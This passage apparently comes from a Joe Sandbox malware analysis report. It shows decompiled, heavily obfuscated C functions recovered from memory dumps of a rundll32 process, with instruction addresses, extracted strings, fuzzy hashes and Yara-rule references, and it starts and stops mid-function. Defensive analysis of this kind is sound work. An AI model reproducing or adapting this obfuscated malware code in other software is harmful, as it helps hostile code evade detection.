											if(_t317 != 0x265fc3c2) {
												L27:
												__eflags = _t317 - 0x2fa258b4;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t353 = 0x1000;
												_push(_t317);
												_v548 = 0x1000;
												_t349 = E004354FB(0x1000);
												_t300 = 0xbce5228;
												_t317 =  !=  ? 0xbce5228 : 0x6eb678d;
												continue;
											}
										}
									}
								}
							}
						}
						L30:
						__eflags = 0;
						return 0;
						goto L31;
					}
					_push(_t317);
					_t302 = E0044C0C8(_v604 | 0x00000006, 1, _v656,  &_v520, _v612, _v588, 0x2000000, _v664, _t317, _v644, _v628);
					_t316 = _t302;
					_t357 =  &(_t357[0xa]);
					__eflags = _t302 - 0xffffffff;
					if(__eflags == 0) {
						_t317 = 0x2fa258b4;
						_t300 = 0xbce5228;
						goto L27;
					} else {
						_t317 = 0x265fc3c2;
						continue;
					}
					goto L30;
				}
			}

0x00448c2b
0x00448c31
0x00448c3e
0x00448c49
0x00448c51
0x00448c53
0x00448c5a
0x00448c61
0x00448c70
0x00448c73
0x00448c77
0x00448c7f
0x00448c87
0x00448c8f
0x00448c97
0x00448c9f
0x00448ca7
0x00448caf
0x00448cb7
0x00448cbb
0x00448cc3
0x00448ccb
0x00448cd3
0x00448cdb
0x00448ce3
0x00448ceb
0x00448cf3
0x00448cfb
0x00448d03
0x00448d0b
0x00448d13
0x00448d1b
0x00448d23
0x00448d2b
0x00448d33
0x00448d3b
0x00448d3f
0x00448d47
0x00448d4f
0x00448d5a
0x00448d65
0x00448d70
0x00448d7d
0x00448d81
0x00448d89
0x00448d91
0x00448d99
0x00448da1
0x00448da9
0x00448dae
0x00448db6
0x00448dbe
0x00448dc6
0x00448dce
0x00448dd6
0x00448ddb
0x00448de3
0x00448deb
0x00448df3
0x00448dfb
0x00448e08
0x00448e0c
0x00448e14
0x00448e1c
0x00448e21
0x00448e29
0x00448e31
0x00448e39
0x00448e41
0x00448e4c
0x00448e54
0x00448e5f
0x00448e6a
0x00448e74
0x00448e7f
0x00448e87
0x00448e8c
0x00448e94
0x00448e9c
0x00448ea4
0x00448eac
0x00448eb4
0x00448eb9
0x00448ec1
0x00448ec9
0x00448ece
0x00448ed6
0x00448ede
0x00448ee6
0x00448ef1
0x00448ef9
0x00448f04
0x00448f0c
0x00448f11
0x00448f19
0x00448f21
0x00448f29
0x00448f34
0x00448f3c
0x00448f47
0x00448f4f
0x00448f57
0x00448f5f
0x00448f67
0x00448f6f
0x00448f7a
0x00448f7f
0x00448f85
0x00448f8d
0x00448f95
0x00448f9d
0x00448fa2
0x00448faa
0x00448fb2
0x00448fba
0x00448fc2
0x00448fcf
0x00448fd0
0x00448fd7
0x00448fde
0x00448fe2
0x00448fea
0x00448ff2
0x00448ffa
0x00449002
0x0044900a
0x00449012
0x00449017
0x0044901f
0x0044902c
0x00449030
0x00449034
0x0044903c
0x0044904a
0x00449051
0x00449055
0x0044905d
0x00449065
0x0044906d
0x00449075
0x0044907d
0x00449085
0x0044908d
0x0044908d
0x00000000
0x00449092
0x004490a4
0x004492b1
0x004490aa
0x004490ac
0x004491b4
0x004491b9
0x004491bc
0x004491be
0x004491c0
0x004491c2
0x004491c2
0x004491c6
0x00000000
0x00000000
0x004491c8
0x004491e1
0x004491e6
0x004491e9
0x004491eb
0x004491f9
0x004491f9
0x00000000
0x00000000
0x00000000
0x004491fa
0x004491fa
0x00000000
0x004491ed
0x004491ed
0x004491ef
0x004491f1
0x004491f3
0x004491c2
0x004491c6
0x00000000
0x00000000
0x004491c6
0x00000000
0x004491f1
0x004491c2
0x00449201
0x00449201
0x00449203
0x00449226
0x0044922b
0x00000000
0x00449205
0x00449216
0x0044921c
0x0044908d
0x0044908d
0x00000000
0x0044908d
0x0044908d
0x00000000
0x004490b2
0x004490b8
0x00449170
0x00449176
0x0044908d
0x0044908d
0x00000000
0x0044908d
0x004490be
0x004490c4
0x0044915c
0x00000000
0x004490ca
0x004490d0
0x0044910e
0x00449122
0x0044913d
0x00449142
0x00449145
0x0044914e
0x00449152
0x0044908d
0x0044908d
0x00000000
0x0044908d
0x004490d2
0x004490d8
0x0044928c
0x0044928c
0x00449292
0x00000000
0x00000000
0x00449298
0x004490de
0x004490e2
0x004490ed
0x004490ee
0x004490fa
0x004490fc
0x00449109
0x00000000
0x00449109
0x004490d8
0x004490d0
0x004490c4
0x004490b8
0x004490ac
0x004492bc
0x004492bc
0x004492c5
0x00000000
0x004492c5
0x00449232
0x00449269
0x0044926e
0x00449270
0x00449273
0x00449276
0x00449282
0x00449287
0x00000000
0x00449278
0x00449278
0x00000000
0x00449278
0x00000000
0x00449276

Strings

<_, xrefs: 00448F29
%n, xrefs: 00448DB6
Y, xrefs: 00448D65
NN, xrefs: 00448FFA
x, xrefs: 0044901F
?0, xrefs: 00448F47
~r, xrefs: 0044903C
$W^, xrefs: 00448D33
/3, xrefs: 00448E14

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
API String ID: 1586166983-2889033865
Opcode ID: 8afdc7c56a4c866ebbba6cf28e1ced504a4268fba55c93644d02f18506f9cf78
Instruction ID: eefe9e55094ed9ec08bf4de7bd42c4b98ce806a91d164068a0a80f68b3eda340
Opcode Fuzzy Hash: 8afdc7c56a4c866ebbba6cf28e1ced504a4268fba55c93644d02f18506f9cf78
Instruction Fuzzy Hash: 54F134715083819FE368CF65C449A5BBBF1BBC5748F108A1DF1EA862A0C7B98909DF47

Uniqueness

Uniqueness Score: -1.00%

Function 0043A821, Relevance: 11.5, Strings: 9, Instructions: 251
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0043A821() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _t237;
				signed int _t241;
				void* _t248;
				void* _t254;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int* _t289;
				void* _t291;

				_t289 =  &_v624;
				_v536 = 0x626641;
				_v532 = 0x129981;
				_t287 = 0;
				_v528 = 0;
				_t254 = 0x2e28b741;
				_v524 = 0;
				_v624 = 0x9755;
				_v624 = _v624 + 0xffff0ffe;
				_v624 = _v624 ^ 0x28143b3a;
				_v624 = _v624 + 0xffff9fa9;
				_v624 = _v624 ^ 0xd7eb3c0e;
				_v616 = 0x61ff;
				_v616 = _v616 + 0xfffff5a9;
				_v616 = _v616 ^ 0x00005781;
				_v540 = 0x95c8;
				_v540 = _v540 << 7;
				_v540 = _v540 ^ 0x004af40b;
				_v600 = 0xc6a5;
				_v600 = _v600 + 0xaa28;
				_v600 = _v600 + 0xffff351e;
				_v600 = _v600 ^ 0x0000ff25;
				_v552 = 0xb452;
				_t280 = 7;
				_v552 = _v552 * 0x64;
				_v552 = _v552 ^ 0x0046227b;
				_v576 = 0xc6c;
				_v576 = _v576 / _t280;
				_v576 = _v576 + 0xffff179a;
				_v576 = _v576 ^ 0xffff33c6;
				_v544 = 0xf54b;
				_v544 = _v544 ^ 0xb6fccf77;
				_v544 = _v544 ^ 0xb6fc572e;
				_v560 = 0xea94;
				_v560 = _v560 ^ 0x74db7c03;
				_v560 = _v560 ^ 0x74dbf042;
				_v572 = 0x748e;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 | 0x7bc5136c;
				_v572 = _v572 ^ 0x7bc5304b;
				_v612 = 0xe3c8;
				_v612 = _v612 >> 0xa;
				_v612 = _v612 << 4;
				_t281 = 0x18;
				_v612 = _v612 / _t281;
				_v612 = _v612 ^ 0x0000698f;
				_v568 = 0x502b;
				_v568 = _v568 | 0xfd850b4b;
				_v568 = _v568 ^ 0xfd8572e2;
				_v584 = 0x41d1;
				_t282 = 0x50;
				_v584 = _v584 / _t282;
				_v584 = _v584 << 6;
				_v584 = _v584 ^ 0x000070a2;
				_v588 = 0x111;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x000020f0;
				_v608 = 0xeb8a;
				_v608 = _v608 << 9;
				_v608 = _v608 << 7;
				_v608 = _v608 * 0x63;
				_v608 = _v608 ^ 0x165e3696;
				_v548 = 0x5039;
				_v548 = _v548 << 5;
				_v548 = _v548 ^ 0x000a43df;
				_v596 = 0x4562;
				_v596 = _v596 + 0x2a80;
				_t283 = 0x26;
				_v596 = _v596 * 0x30;
				_v596 = _v596 ^ 0x00148087;
				_v624 = 0x923e;
				_v624 = _v624 / _t283;
				_t284 = 0x7c;
				_v624 = _v624 / _t284;
				_v624 = _v624 ^ 0x19d80190;
				_v624 = _v624 ^ 0x19d83119;
				_v564 = 0xf45b;
				_v564 = _v564 << 0xd;
				_v564 = _v564 ^ 0x1e8b638e;
				_v616 = 0xdafb;
				_v616 = _v616 | 0xdd6b0501;
				_v616 = _v616 ^ 0xdd6b820b;
				_v580 = 0xc4fe;
				_t285 = 0x6c;
				_v580 = _v580 * 0x2e;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x011b5ac6;
				_v556 = 0xca0a;
				_v556 = _v556 + 0xe013;
				_v556 = _v556 ^ 0x00019dbb;
				_v604 = 0x6c6f;
				_v604 = _v604 >> 0x10;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x00007655;
				_v592 = 0xed8d;
				_v592 = _v592 + 0x2fd9;
				_t286 = _v616;
				_v592 = _v592 / _t285;
				_v592 = _v592 ^ 0x000f029b;
				while(1) {
					_t291 = _t254 - 0x2e28b741;
					if(_t291 > 0) {
						goto L16;
					}
					L2:
					if(_t291 == 0) {
						_push(_t254);
						_t241 = E004354FB(0x45c);
						 *0x451088 = _t241;
						__eflags = _t241;
						if(_t241 == 0) {
							L23:
							return _t287;
						}
						 *((intOrPtr*)(_t241 + 0x10)) = E00442C05;
						_t254 = 0x1b0f9495;
						continue;
						do {
							while(1) {
								_t291 = _t254 - 0x2e28b741;
								if(_t291 > 0) {
									goto L16;
								}
								goto L2;
							}
							goto L16;
							L22:
							__eflags = _t254 - 0x2142cdf5;
						} while (_t254 != 0x2142cdf5);
						goto L23;
					}
					if(_t254 == 0x1f0026e) {
						_v620 = 0xbbec;
						_t254 = 0x21dfc09c;
						_v620 = _v620 >> 0x10;
						_v620 = _v620 ^ 0x00000029;
						continue;
					}
					if(_t254 == 0x1b0f9495) {
						_t286 = E0044340E(_v552, _v576, _t254, _t254, _v592);
						_t289 =  &(_t289[3]);
						__eflags = _t286;
						if(_t286 == 0) {
							_t254 = 0x3b91f90e;
						} else {
							 *((intOrPtr*)( *0x451088 + 0x244)) = 1;
							_t254 = 0x1f0026e;
						}
						continue;
					}
					if(_t254 == 0x21dfc09c) {
						E00435AB8(_v544, _v560, _v572, _v612, _t286);
						_t289 =  &(_t289[3]);
						L9:
						_t254 = 0x28cf3aa7;
						continue;
					}
					if(_t254 != 0x28cf3aa7) {
						goto L22;
					}
					_push(_t254);
					E0043471A(_v620,  *0x451088 + 0x254, _v568, _v584, _v588, _v608, _v548);
					_t289 =  &(_t289[8]);
					_t254 = 0x36e34156;
					_t248 = 1;
					_t287 =  ==  ? _t248 : _t287;
					continue;
					L16:
					__eflags = _t254 - 0x36cafd3f;
					if(__eflags == 0) {
						_push(_t254);
						E0043DFD8(_v596,  &_v520, __eflags, _v624, _v564);
						_t237 = E0043165C( &_v520, _v616, _v580, _v556, _v604);
						_t289 =  &(_t289[6]);
						 *((intOrPtr*)( *0x451088)) = _t237;
						_t254 = 0x2142cdf5;
						goto L22;
					}
					__eflags = _t254 - 0x36e34156;
					if(_t254 == 0x36e34156) {
						E00441F88();
						_t254 = 0x36cafd3f;
						continue;
					}
					__eflags = _t254 - 0x3b91f90e;
					if(_t254 != 0x3b91f90e) {
						goto L22;
					}
					_v620 = 0xad6;
					_v620 = _v620 * 0x11;
					_v620 = _v620 * 0x50;
					_v620 = _v620 | 0x0e445f63;
					_v620 = _v620 ^ 0x0e7ddfff;
					 *((intOrPtr*)( *0x451088 + 0x14)) = E00445153;
					goto L9;
				}
			}

0x0043a821
0x0043a82b
0x0043a835
0x0043a83d
0x0043a844
0x0043a848
0x0043a84a
0x0043a84e
0x0043a856
0x0043a85e
0x0043a866
0x0043a86e
0x0043a876
0x0043a87e
0x0043a886
0x0043a88e
0x0043a896
0x0043a89b
0x0043a8a3
0x0043a8ab
0x0043a8b3
0x0043a8bb
0x0043a8c3
0x0043a8d2
0x0043a8d5
0x0043a8d9
0x0043a8e1
0x0043a8f1
0x0043a8f5
0x0043a8fd
0x0043a905
0x0043a90d
0x0043a915
0x0043a91d
0x0043a925
0x0043a92d
0x0043a935
0x0043a93d
0x0043a942
0x0043a94a
0x0043a952
0x0043a95a
0x0043a95f
0x0043a968
0x0043a96d
0x0043a973
0x0043a97b
0x0043a983
0x0043a98b
0x0043a993
0x0043a99f
0x0043a9a2
0x0043a9a6
0x0043a9ab
0x0043a9b3
0x0043a9bb
0x0043a9c0
0x0043a9c5
0x0043a9cd
0x0043a9d5
0x0043a9da
0x0043a9e4
0x0043a9e8
0x0043a9f0
0x0043a9fa
0x0043aa04
0x0043aa0c
0x0043aa14
0x0043aa23
0x0043aa26
0x0043aa2a
0x0043aa32
0x0043aa42
0x0043aa4a
0x0043aa4f
0x0043aa55
0x0043aa5d
0x0043aa65
0x0043aa6d
0x0043aa72
0x0043aa7a
0x0043aa82
0x0043aa8a
0x0043aa92
0x0043aa9f
0x0043aaa0
0x0043aaa4
0x0043aaa9
0x0043aab1
0x0043aab9
0x0043aac1
0x0043aac9
0x0043aad1
0x0043aad6
0x0043aadb
0x0043aae3
0x0043aaeb
0x0043aaf9
0x0043aafd
0x0043ab01
0x0043ab09
0x0043ab09
0x0043ab0b
0x00000000
0x00000000
0x0043ab11
0x0043ab11
0x0043abfd
0x0043abfe
0x0043ac03
0x0043ac09
0x0043ac0b
0x0043acda
0x0043ace5
0x0043ace5
0x0043ac11
0x0043ac18
0x0043ac1d
0x0043ab09
0x0043ab09
0x0043ab09
0x0043ab0b
0x00000000
0x00000000
0x00000000
0x0043ab0b
0x00000000
0x0043accd
0x0043accd
0x0043accd
0x00000000
0x0043ab09
0x0043ab1d
0x0043abd4
0x0043abdc
0x0043abe1
0x0043abe6
0x00000000
0x0043abe6
0x0043ab29
0x0043aba9
0x0043abab
0x0043abae
0x0043abb0
0x0043abca
0x0043abb2
0x0043abba
0x0043abc0
0x0043abc0
0x00000000
0x0043abb0
0x0043ab31
0x0043ab87
0x0043ab8c
0x0043ab8f
0x0043ab8f
0x00000000
0x0043ab8f
0x0043ab35
0x00000000
0x00000000
0x0043ab3b
0x0043ab5f
0x0043ab64
0x0043ab67
0x0043ab70
0x0043ab71
0x00000000
0x0043ac22
0x0043ac22
0x0043ac28
0x0043ac88
0x0043ac9c
0x0043acb8
0x0043acc3
0x0043acc6
0x0043acc8
0x00000000
0x0043acc8
0x0043ac2a
0x0043ac30
0x0043ac79
0x0043ac7e
0x00000000
0x0043ac7e
0x0043ac32
0x0043ac38
0x00000000
0x00000000
0x0043ac3e
0x0043ac4b
0x0043ac54
0x0043ac58
0x0043ac60
0x0043ac6d
0x00000000
0x0043ac6d

Strings

+P, xrefs: 0043A97B
VA6, xrefs: 0043AC2A
), xrefs: 0043ABE6
9P, xrefs: 0043A9F0
VA6, xrefs: 0043AB67
bE, xrefs: 0043AA0C
{"F, xrefs: 0043A8D9
Uv, xrefs: 0043AADB
Afb, xrefs: 0043A82B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
API String ID: 0-509329050
Opcode ID: eabf8515cdbb4136b2de294c37577831f4ad7f6cd634550cb29ca26377eb6347
Instruction ID: 2b76f3c695292d07bc0a1947a1c37ed1709be8c5405d2a3b607e13600c3a6d5c
Opcode Fuzzy Hash: eabf8515cdbb4136b2de294c37577831f4ad7f6cd634550cb29ca26377eb6347
Instruction Fuzzy Hash: 71C131711083819BD358CF25C98991BFBE2BBC8B48F105A1EF1D6962A0C3B9C959CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00179D95, Relevance: 11.5, Strings: 9, Instructions: 251COMMON

Download Yara Rule

Strings

VA6, xrefs: 0017A19E
Afb, xrefs: 00179D9F
9P, xrefs: 00179F64
+P, xrefs: 00179EEF
Uv, xrefs: 0017A04F
VA6, xrefs: 0017A0DB
), xrefs: 0017A15A
bE, xrefs: 00179F80
{"F, xrefs: 00179E4D

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
API String ID: 0-509329050
Opcode ID: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
Instruction ID: a079e614cc510f3815264d36637d2a18e4f2fe31c6a34ec061efec981de52300
Opcode Fuzzy Hash: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
Instruction Fuzzy Hash: 3CC131711093819BE358CF25C58991FBBF1BFD4748F508A1EF19A962A0C3B98A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00186158, Relevance: 11.5, Strings: 9, Instructions: 244COMMON

Download Yara Rule

Strings

Sq, xrefs: 001863A6
W}, xrefs: 001861EB
{V, xrefs: 00186307
5I[, xrefs: 00186281
l, xrefs: 00186181
\, xrefs: 0018624C
:Q, xrefs: 0018646E
#Q, xrefs: 0018649B
.=C, xrefs: 00186342

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
API String ID: 0-1292055276
Opcode ID: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
Instruction ID: a2cb58975a3479ffa0c5fdfe98d6f43240c4d947e30aba83c1a0a51ab9c7070b
Opcode Fuzzy Hash: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
Instruction Fuzzy Hash: 04C112724083809FE369DF65C98954FFBF1BB94748F504A1DF1A6962A0D7B98A08CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0044C6D9, Relevance: 10.3, Strings: 8, Instructions: 297
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0044C6D9(intOrPtr* __edx, intOrPtr _a4) {
				signed int _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* __ecx;
				void* _t252;
				void* _t281;
				intOrPtr _t284;
				void* _t289;
				void* _t293;
				short _t294;
				signed int _t295;
				signed int _t296;
				void* _t298;
				intOrPtr* _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t357;
				signed int* _t359;
				void* _t361;

				_push(_a4);
				_t340 = __edx;
				_push(__edx);
				_v8 = __edx;
				E00442550(_t252);
				_v12 = _v12 & 0x00000000;
				_t359 =  &(( &_v104)[3]);
				_v36 = 0x3d9b;
				_v36 = _v36 + 0x87e4;
				_t298 = 0xa757dfd;
				_v36 = _v36 ^ 0x00003896;
				_v16 = 0xa1a2;
				_t344 = 0x7e;
				_v16 = _v16 / _t344;
				_v16 = _v16 ^ 0x00005f0b;
				_v20 = 0xd4a;
				_v20 = _v20 ^ 0x823c7950;
				_v20 = _v20 ^ 0x823c4fb0;
				_v80 = 0x8dd3;
				_v80 = _v80 + 0xffff84c4;
				_t345 = 0x3a;
				_v80 = _v80 / _t345;
				_t346 = 0xf;
				_v80 = _v80 / _t346;
				_v80 = _v80 ^ 0x00002598;
				_v84 = 0x28b2;
				_v84 = _v84 ^ 0xae38f700;
				_t347 = 0x16;
				_v84 = _v84 * 0x2b;
				_v84 = _v84 >> 4;
				_v84 = _v84 ^ 0x0438ce96;
				_v100 = 0xb16b;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x3a2fdb23;
				_v100 = _v100 / _t347;
				_v100 = _v100 ^ 0x02a4abe7;
				_v32 = 0x883d;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00442a4b;
				_v92 = 0xca89;
				_v92 = _v92 << 0xe;
				_v92 = _v92 + 0x8a44;
				_t348 = 0x29;
				_v92 = _v92 / _t348;
				_v92 = _v92 ^ 0x013c4aa7;
				_v52 = 0x404;
				_t349 = 0x6a;
				_v52 = _v52 / _t349;
				_v52 = _v52 + 0xffff84cc;
				_v52 = _v52 ^ 0xffffb1d7;
				_v96 = 0x1382;
				_v96 = _v96 ^ 0xdda77c38;
				_v96 = _v96 << 2;
				_t350 = 0x21;
				_v96 = _v96 / _t350;
				_v96 = _v96 ^ 0x03984523;
				_v28 = 0x72c9;
				_v28 = _v28 + 0xc1ec;
				_v28 = _v28 ^ 0x000116d9;
				_v88 = 0xe360;
				_v88 = _v88 << 1;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0xffffdc99;
				_v88 = _v88 ^ 0x00002bb3;
				_v24 = 0xb27;
				_v24 = _v24 | 0x54af4a27;
				_v24 = _v24 ^ 0x54af70c5;
				_v104 = 0x20e9;
				_v104 = _v104 ^ 0x30957c1a;
				_v104 = _v104 >> 1;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 ^ 0x000644e5;
				_v60 = 0x5e02;
				_v60 = _v60 << 0xc;
				_t351 = 0x6b;
				_t295 = _v4;
				_t357 = _v4;
				_v60 = _v60 * 0x29;
				_v60 = _v60 ^ 0xf0e520c4;
				_v64 = 0x8dff;
				_v64 = _v64 * 0x38;
				_v64 = _v64 + 0x458e;
				_v64 = _v64 ^ 0x001f749b;
				_v40 = 0x5c65;
				_v40 = _v40 / _t351;
				_v40 = _v40 ^ 0x00006d1c;
				_v72 = 0xc60a;
				_v72 = _v72 + 0x70bb;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x026de662;
				_v76 = 0x47c;
				_v76 = _v76 + 0xffff5521;
				_v76 = _v76 ^ 0xd2a60678;
				_t352 = 0x14;
				_t353 = _v4;
				_v76 = _v76 / _t352;
				_v76 = _v76 ^ 0x02446ded;
				_v44 = 0xfc2b;
				_v44 = _v44 + 0x96d4;
				_v44 = _v44 ^ 0x17589983;
				_v44 = _v44 ^ 0x17594bcd;
				_v48 = 0xed74;
				_v48 = _v48 + 0x9236;
				_v48 = _v48 ^ 0x53004543;
				_v48 = _v48 ^ 0x53013ae9;
				_v56 = 0x1029;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x46c265d9;
				_v56 = _v56 ^ 0x46d24cd9;
				_v68 = 0xb47b;
				_v68 = _v68 + 0x930f;
				_v68 = _v68 | 0xf81d1365;
				_v68 = _v68 ^ 0xf81d57ef;
				while(1) {
					while(1) {
						L2:
						_t361 = _t298 - 0x16ae89bd;
						if(_t361 <= 0) {
							break;
						}
						if(_t298 == 0x1dc5383f) {
							E00432DDF(_v16,  &_v12, _v20, E00449B4A);
							_t298 = 0x3a204f2b;
							goto L25;
						} else {
							if(_t298 == 0x3a204f2b) {
								_t353 = _v48;
								_t342 = _v12;
								_v4 = _t353;
								if(_t342 != 0) {
									do {
										_t289 = E0044232B(_v80, _t342 + 0x1c, _v84);
										_t342 =  *((intOrPtr*)(_t342 + 8));
										_t353 = _t353 + 1 + _t289;
									} while (_t342 != 0);
									_v4 = _t353;
									_t281 = 0x3afc2fec;
								}
								_t298 = 0x16ae89bd;
								goto L19;
							} else {
								if(_t298 != _t281) {
									L25:
									if(_t298 != 0x1813df8a) {
										continue;
									} else {
									}
								} else {
									_t295 = _v56;
									_t343 = _v12;
									if(_t343 != 0) {
										do {
											_t221 =  &_v28; // 0x442a4b
											E004403F1(_v92, _v52, _t343 + 0x1c, _t295 * 2 + _t357, _v96,  *_t221);
											_t293 = E0044232B(_v88, _t343 + 0x1c, _v24);
											_t359 =  &(_t359[5]);
											_t296 = _t295 + _t293;
											_t294 = 0x2c;
											 *((short*)(_t357 + _t296 * 2)) = _t294;
											_t295 = _t296 + 1;
											_t343 =  *((intOrPtr*)(_t343 + 8));
										} while (_t343 != 0);
										_t281 = 0x3afc2fec;
									}
									_t353 = _v4;
									_t298 = 0x18c8122;
									L19:
									_t340 = _v8;
									continue;
								}
							}
						}
						L30:
						return 0 |  *_t340 != 0x00000000;
					}
					if(_t361 == 0) {
						_push(_t298);
						_t357 = E004354FB(_t353 + _t353);
						_t281 = 0x3afc2fec;
						_t298 =  !=  ? 0x3afc2fec : 0x3fa0ed8;
						goto L2;
					} else {
						if(_t298 == 0x18c8122) {
							 *(_t340 + 4) = _v68;
							_t284 = E00437731(_t357, _t340 + 4, _v36, _v104, _v60, _v64, _t295 - 1);
							_t359 =  &(_t359[5]);
							 *_t340 = _t284;
							_t298 = 0xfb62ecd;
							continue;
						} else {
							if(_t298 == 0x3fa0ed8) {
								_t341 = _v12;
								if(_t341 != 0) {
									do {
										_t354 =  *(_t341 + 8);
										E0043DE81(_v76, _t341, _v44);
										_t341 = _t354;
									} while (_t354 != 0);
								}
								_t340 = _v8;
							} else {
								if(_t298 == 0xa757dfd) {
									_t298 = 0x1dc5383f;
									goto L2;
								} else {
									if(_t298 != 0xfb62ecd) {
										goto L25;
									} else {
										E0043DE81(_v40, _t357, _v72);
										_t298 = 0x3fa0ed8;
										while(1) {
											goto L2;
										}
									}
								}
							}
						}
					}
					goto L30;
				}
			}

0x0044c6e0
0x0044c6e4
0x0044c6e6
0x0044c6e8
0x0044c6ec
0x0044c6f1
0x0044c6f6
0x0044c6f9
0x0044c703
0x0044c70b
0x0044c710
0x0044c718
0x0044c726
0x0044c72b
0x0044c731
0x0044c739
0x0044c741
0x0044c749
0x0044c751
0x0044c759
0x0044c765
0x0044c76a
0x0044c774
0x0044c779
0x0044c77f
0x0044c787
0x0044c78f
0x0044c79c
0x0044c79f
0x0044c7a3
0x0044c7a8
0x0044c7b0
0x0044c7b8
0x0044c7bd
0x0044c7cd
0x0044c7d1
0x0044c7d9
0x0044c7e1
0x0044c7e6
0x0044c7ee
0x0044c7f6
0x0044c7fb
0x0044c807
0x0044c80c
0x0044c812
0x0044c81a
0x0044c826
0x0044c829
0x0044c82d
0x0044c835
0x0044c83d
0x0044c845
0x0044c84f
0x0044c85a
0x0044c85f
0x0044c865
0x0044c86d
0x0044c875
0x0044c87d
0x0044c885
0x0044c88d
0x0044c891
0x0044c896
0x0044c89e
0x0044c8a6
0x0044c8ae
0x0044c8b6
0x0044c8be
0x0044c8c6
0x0044c8ce
0x0044c8d2
0x0044c8d7
0x0044c8df
0x0044c8e7
0x0044c8f1
0x0044c8f4
0x0044c8f8
0x0044c8fc
0x0044c900
0x0044c908
0x0044c915
0x0044c919
0x0044c921
0x0044c929
0x0044c939
0x0044c93d
0x0044c945
0x0044c94d
0x0044c955
0x0044c95a
0x0044c962
0x0044c96a
0x0044c972
0x0044c97e
0x0044c981
0x0044c985
0x0044c989
0x0044c991
0x0044c999
0x0044c9a1
0x0044c9a9
0x0044c9b1
0x0044c9b9
0x0044c9c1
0x0044c9c9
0x0044c9d1
0x0044c9d9
0x0044c9de
0x0044c9e6
0x0044c9ee
0x0044c9f6
0x0044c9fe
0x0044ca06
0x0044ca0e
0x0044ca13
0x0044ca13
0x0044ca13
0x0044ca19
0x00000000
0x00000000
0x0044cac8
0x0044cb94
0x0044cb9b
0x00000000
0x0044cace
0x0044cad4
0x0044cb48
0x0044cb4c
0x0044cb50
0x0044cb56
0x0044cb58
0x0044cb63
0x0044cb68
0x0044cb6c
0x0044cb6f
0x0044cb73
0x0044cb77
0x0044cb77
0x0044cb7c
0x00000000
0x0044cad6
0x0044cad8
0x0044cba5
0x0044cbab
0x00000000
0x00000000
0x0044cbb1
0x0044cade
0x0044cade
0x0044cae2
0x0044cae8
0x0044caea
0x0044caea
0x0044cb08
0x0044cb17
0x0044cb1c
0x0044cb1f
